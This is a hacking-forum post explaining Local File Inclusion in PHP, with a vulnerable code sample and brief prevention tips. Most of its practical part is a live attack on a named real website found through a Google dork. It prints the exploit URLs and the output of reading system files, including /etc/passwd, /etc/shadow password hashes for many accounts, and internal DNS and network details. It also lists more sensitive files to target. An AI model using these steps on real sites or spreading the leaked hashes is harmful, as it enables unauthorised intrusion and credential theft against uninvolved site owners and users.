Members Login
Username 
 
Password 
    Remember Me  
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> Website and Forum Hacking -> What is Local File Inclusion Vulnerability? (Practical Explanation)
Post Info TOPIC: What is Local File Inclusion Vulnerability? (Practical Explanation)
cYber-coder


Senior Member

Status: Offline
Posts: 317
Date:
What is Local File Inclusion Vulnerability? (Practical Explanation)
Permalink Closed

cxun73h.png


m6lbiaa.jpg


Hello dear TurkHackTeam members, in this post I will talk about the Local File Inclusion vulnerability and try to explain what kind of data you can access by using this vulnerability.
bcvukdo.png

LFI, or Local File Inclusion , is web security vulnerability . Thanks to this vulnerability , we can read, change or run any file on the server. The main reason for this vulnerability is that the data is not properly filtered and verified by the site administration or administrator and any file is directly imported ( with functions such as include, require

). We can explain an example LFI situation as follows;
PHP:
<?php
    $page = $_GET['page'];
    include($page . '.php');
?>

 

If the page structure is like this, it can access the page it wants by manipulating the URL structure. When we want to go to the contact page, the URL will be like this;
Code:
http://denemesite.com/index.php?page=iletisim

 

How to Prevent LFI Vulnerability?
1. Validation of User Input
File names entered by the user must be filtered. Only allowed file names should be accessible.
To achieve this, a code like this can be written;
PHP:
$allowed_pages = ['anasayfa', 'hakkimizda', 'iletisim'];
if (in_array($_GET['page'], $allowed_pages)) {
    include($_GET['page'] . '.php');
} else {
    echo "Bu sayfayı görmek için yetkiniz yok!";
}

2. URL Sanitization We can prevent characters like../or..
in the entered file names . 3. Real File Paths Instead of dynamically adding files, we can fix the file paths and ensure that only certain files are used. 4. Server Configuration We can control the access permissions to important files by limiting the access to the local file system on our server.We can limit the file inclusion functionsinPHPopen_basediranddisable_functions







f7ld9o0.png

So let's get to the main topic, how can we evaluate the LFI vulnerability?
First of all, we do a small dork search on Google , I searched for index.php?page= to make it very simple I went to the first page that came up and started trying them in order. 1. /etc/passwd With this directory, I can see the user information and perform a Bruteforce attack with this information. URL: Output :




https://www.ravagedband.com/index.php?page=/etc/passwd

Code:
root:x:0:0:root:/root:/bin/false ravagedband.com:x:53224:53224:ravagedband.com:/home/ravagedband.com:/bin/false

2. /etc/shadow
With this directory, I can see the hash of users' passwords and enter the system after cracking them with the help of password crackers.
URL: Output :https://www.ravagedband.com/index.php?page=/etc/shadow

Code:
ops:$1$LBFm$s2euEaNrozNuVen/fGVRj0:13064:0:99999:7::::support:$1$jRpm$d5WBSoc6c.jkAPBG5RFXc1:13064:0:99999:7::::toor:$1$Ux92$2dtHAOwocjlkhs/xwKRKz.:13064:0:99999:7::::helpdesk:$1$Df1y$5m3iZxLKnjX9MDAs3MljJ/:13064:0:99999:7::::admin:$1$mFOR$Slfj943C.MuQz9s3M8J6C0:13064:0:99999:7::::system:$1$Sszb$uFp7Kgkt06PVhdXCKn8y40:13064:0:99999:7::::cleanup:$1$oJ6t$VSzxsG6nuEr7wgWCLFsqD1:13064:0:99999:7::::recover:$1$6Z6K$Sc9OQ6TnY3FDYeqE.E8Aw0:13064:0:99999:7::::sup:$1$wW5e$BSR.XshymKTyuW1LsABpO1:13064:0:99999:7::::remote:$1$xYjc$eIqKNslONGB.ZBOEn3cyl0:13064:0:99999:7::::safe:$1$a+Tm$FCFvtO13n69N.Ee6gTZxm0:13064:0:99999:7::::noc:$1$WXSI$/NQjcNBJCiSjcHgJA1PAz1:13064:0:99999:7::::ssladmin:$1$s74D$QJJB1kVVnz09VXh.tp9640:13064:0:99999:7::::database:$1$iT3a$Z/QnO6u4S84KT2lImkpcW1:13064:0:99999:7::::onecom:$1$+2i9$HBk3s0VZ612q1nIJ/zTjI0:13064:0:99999:7::::staff:$1$egIQ$jZQZbOwSXbC3ivPL7wJ9n/:13064:0:99999:7::::guest:$1$W4Qw$gtYKhT6C4FAmqN.98IoLC0:13064:0:99999:7::::

3. /etc/hosts DNS
through this directory, whichIPwhichDNSa DNS Poisoningattackby manipulating this file . URL: Output :
https://www.ravagedband.com/index.php?page=/etc/hosts

Code:
127.0.0.1    localhost::1        localhost ip6-localhost ip6-loopbackff02::1        ip6-allnodesff02::2        ip6-allrouters

4. /etc/hostname
With this directory I can learn the host name of the server.
URL: Output :https://www.ravagedband.com/index.php?page=/etc/hosts

Code:
onecom

5. /etc/resolv.conf
This directorythe DNSservers used by the system.
URL: Output :https://www.ravagedband.com/index.php?page=/etc/resolv.conf

Code:
domain cst.webpod10-cph3.one.comnameserver 10.41.62.5nameserver 10.41.62.4options rotate timeout:1

We can only access this data on the site we tried.

Apart from these, you can see network configuration settings with /etc/network/interfaces , SSH configuration with /etc/ssh/sshd_config , disk structure in the system with / etc/fstab , scheduled tasks with /etc/crontab , which software the package manager uses with /etc/apt/sources.list , and which users can use the sudo command with /etc/sudoers .


__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> Website and Forum Hacking -> What is Local File Inclusion Vulnerability? (Practical Explanation)
Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse 		Powered by ActiveBoard